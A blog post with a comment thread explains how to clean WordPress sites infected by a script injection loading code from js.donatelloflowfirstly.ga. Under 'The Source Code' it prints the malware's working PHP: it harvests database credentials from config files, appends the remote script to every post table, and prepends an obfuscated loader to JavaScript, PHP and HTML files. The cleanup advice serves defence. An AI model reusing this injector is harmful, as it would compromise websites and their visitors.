Cheap VPS Hosting Promos
VPS Coupon Codes, Reviews, Tutorials

How to Remove "js.donatelloflowfirstly.ga" from Wordpress

WARNING: New malware is attacking wordpress sites by injecting "js.donatelloflowfirstly.ga" JS code to site files and blog posts!

js.donatelloflowfirstly.ga

How it works

New virus from the domain " js.donatelloflowfirstly.ga " is infecting many WordPress sites these days by injecting a line of JS code into the wordpress themes/plugins files and all posts and pages via sql command. The virus will redirect the sites to malicious domains like  blackwaterforllows.ga ,  donatelloflowfirstly.ga , and  blackwaterforllows.ga .

<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript’></script>

donatelloflowfirstly.ga

How to remove the "js.donatelloflowfirstly.ga" code

There is no clues how this happened and where is the backdoor till now, the only way is to clean it manually! Here is my steps:

1: First Step

Very important. De-active CDN function first, and you need to turn offer Memcached / Redis if you are running these with VPS hosting.

2: Basic Step

1): Check your root  /public_html  folder via Cpanel, or you can manager files with other panel if your sites running on VPS. Find and delete the new generated malware file. Most of time the file named with  _a  or  _t , there is no suffix.

2): Delete all Cached Files. Many wordpress sites installed cache plugins, just delete those cached files since most of them been injected too. Normally the cached files are located in folder  wp-content .


3: Clean the DataBase

It's easy to manager your database with Phpmyadmin, or you can run the command via SSH if running your site wit LNMP on VPS.

Login Phpmyadmin via Cpanel or other panels, click on the site database, and run the following SQL command:

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript’></script>”, ‘’));


4: Clean Core Files

There are many ways to clean your wordpress files. Here is my way:

1): Zip all the site files and download the zip file to desktop.

2): Unzip the files to the folder, " waikey " as an example.

3): Located to the folder  wp-content / plugins , and delete all plugins. Then replace with the clean plugins into the folder. Same with themes files, delete all themes and replace with clean themes.

4): Now run the VSCode editor, you can download it at: https://code.visualstudio.com/ and install it.

5): Open the  waikey (example) folder via VSCode, then click  Edit > Search in the files  to search the keywords:  donatelloflowfirstly . There should be only a few files been found since we have deleted all Cached Files and replaced all Themes and Plugins. Edit those files if you know how to or just replace them with clean files.

6): All files should be clean now. Delete your whole site, and upload this clean backup to the site folder. Your site should be OK.

There is another way to clean the file if you can login to site admin panel. Install  Wordfence  plugin and scan the whole stie. The Wordfence will find out those injected files, just edit them or replace them with clean files.


5: Backup Your Site

Test your site, everything should be OK if your followed the steps above. Now you can re-active the CDN, turn on the memcached or redis.

Backup your clean site and database, and keep backup everytime you post a new article or some other works since people still don't know where is the backdoor and how to fix it.


Conclusion

As I said, people still don't know where is the backdoor and how it generate/download the malware file, but most probably it's from Nulled Plugin & Themes. So it's better to remove all themes and plugins you have downloaded from warez sites and buy the official version if you need them. AND REMEBER to backup your site and database.


Plus Update

Depends on research, there are 3 opinion on this backdoor

1: Backdoor comes with the nulled themes or plugins, so just delete them and only use the official version.

2: The "Ultimate Addons for Elementor" plugin been hacked. Then just delete the plugin or update it if available.

3: Strange thing I met is that I have no "Ultimate Addons for Elementor" installed on my site.
But my theme is based on "Option Framework", don't know if it's been hacked since this framwork has not been updated for several years.


Plus Update +

Make sure to check if there are suspicious files loceted in the folder  wp-content / mu-plugins , most of time it is  rms_unique_wp_mu_pl_fl_nm.php . This file is generated by another file:  rms-script-ini.php  bundled in many nulled plugins such as wp-rocket, to steal your login credentials.

Delete it and clean your files following the step 4. Here is a useful video for this kind of backdoor:

The Source Code

Check the source code of the js.donatelloflowfirstly.ga malware file. The file will seearch certain files and inject the JS code, and run a SQL command to inject the code to post and pages.

<?php echo "ssqqss>>>";
error_reporting(E_ALL);
ini_set('display_errors',1);

search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
die();


function get_var_reg($pat,$text) {

if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}

return "";
}
function search_file_ms($dir,$file_to_search){

$search_array = array();

$files = scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_ms( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_ms( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {

show_sitenames($path);



}

} else if($value != "." && $value != "..") {

@search_file_ms($path, $file_to_search);

}
}
}
function show_sitenames($file){
$content = @file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {


$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);

// Create connection
$conn = new mysqli($host, $user, $pass);

// Check connection
if ($conn->connect_error) {

} else {

$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "js.donatelloflowfirstly.ga") === false){
if(strpos($val, "js.donatelloflowfirstly.ga") === false){


$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%js.donatelloflowfirstly.ga%'";
$conn->query($q3);
echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];

} else {

}

}
}
} else {
}
}
} else {
}
$conn->close();
}
}
}

function search_file($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

make_it($path);

} }else if($value != "." && $value != "..") {

search_file($path, $file_to_search);

}
}

}

function search_file_index($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

search_file_index( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

search_file_index( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

make_it_index($path);

} }else if($value != "." && $value != "..") {

search_file_index($path, $file_to_search);

}
}

}
function search_file_js($dir,$file_to_search){

$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_js( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_js( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {

make_it_js($path);

} }else if($value != "." && $value != "..") {

search_file_js($path, $file_to_search);

}
}

}

function make_it_js($f){
$g = file_get_contents($f);

if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "js:".$f."\r\n";
}


}
function make_it_index($f){

if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false || strpos($g, 'js.donatelloflowfirstly.ga') !== false) {

} else {
$l2 = "<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;

@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."\r\n";

}
}

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {

} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}

}
}

REMEBER to backup your site and database everytime you post an article these days.


Comments

  • Nickname (*)
  • Email (*)
  • Website
  1. #1

    La primera vez lo solucioné cambiando las redirecciones en phpMyAdmin,segunda vez en el mismo sitio este archivo está intacto, pero
    encontré el código malicioso en el archivo functions.php del tema Child pero no se que cambiarle:

    ad1months ago (08-22)Reply
    • Just translated your comment with Google, hope there is no mistake!
      Yeah I have found the same problem even I have disable-abled all nulled or unused plugins, so I think the problem should be the "Option Framework" themes!

      For the malicious code founded in the functions.php, just edit and delete the code, and check the Phpmyadmin if there is a code end with "1=1" or "2=2" start with the "donatelloflowfirstly" domain, delete it if available!

      Keep in mind backup your site and database everyday!

      Waikey1months ago (08-22)Reply
      • updated the content about the backdoor stealing login credentials.

        Waikey1months ago (08-24)Reply
  2. #2

    Database query won't work since mysql sees ? as a parameter and wont execute query

    Anton1months ago (08-24)Reply
    • don't know why, have you changed the double quotation marks

      Waikey1months ago (08-24)Reply
      • Nope, I copied your query as is, but phpmyadmin says it cant execute, because query has a ?

        #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript' at line 1

        Anton1months ago (08-24)Reply
      • Okay, I think changing all the “ to " helps.

        Anton1months ago (08-24)Reply
        • updated the content about the backdoor

          Waikey1months ago (08-24)Reply
          • No, what I mean is, I changed this:
            UPDATE wp_posts SET post_content = (REPLACE (post_content, “”, ‘’));

            to look like this, and then the query executed and worked:
            UPDATE wp_posts SET post_content = (REPLACE (post_content, "", ''));

            ----------

            Changing the quotation marks to look like this " instead of these “ - allows the query to execute in PHPmyAdmin.

            Anton1months ago (08-24)
          • That's the same as the query in the post ...

            Waikey1months ago (08-26)
  3. #3

    Hi

    I found out that the Flycart Plugin (Discount Rules) is the one that caused this problem
    Their plugin have a security hole but they already rolled out a fix for this issue

    Watch out for those who installed this plugin

    ca21months ago (08-25)Reply
    • Thanks for your info !

      Waikey1months ago (08-26)Reply
  4. #4

    I have a problem with the sintax of the mysql query. It says my problem is the ? at the end of .js; stat.js?n=ns1

    kinkinho1months ago (08-26)Reply
    • it shoud be the error of the quataion sign: " , try this: UPDATE wp_posts SET post_content = (REPLACE (post_content, "", '')); add the js code in the [""]

      Waikey1months ago (08-27)Reply
  5. #5

    Sintax error on mysql 🙁 already fixed the quotes, put it says that a variable is missing near (?)

    kinkinho1months ago (08-26)Reply
    • try this: UPDATE wp_posts SET post_content = (REPLACE (post_content, "", '')); add the js code in the [""]

      Waikey1months ago (08-27)Reply
  6. #6

    after searching and searching I found the _lit file or something like that, where this code was, somewhere in the wp-content. I don't know what is the plugin that has the backdoor

    zek3weeks ago (09-11)Reply
    • _a or _t file, delete it and fix the injected code. replace the nulled plugins with official version!

      Waikey2weeks ago (09-18)Reply

GET BEST CHEAP VPS DEALS HERE!

Counpon CodesReviews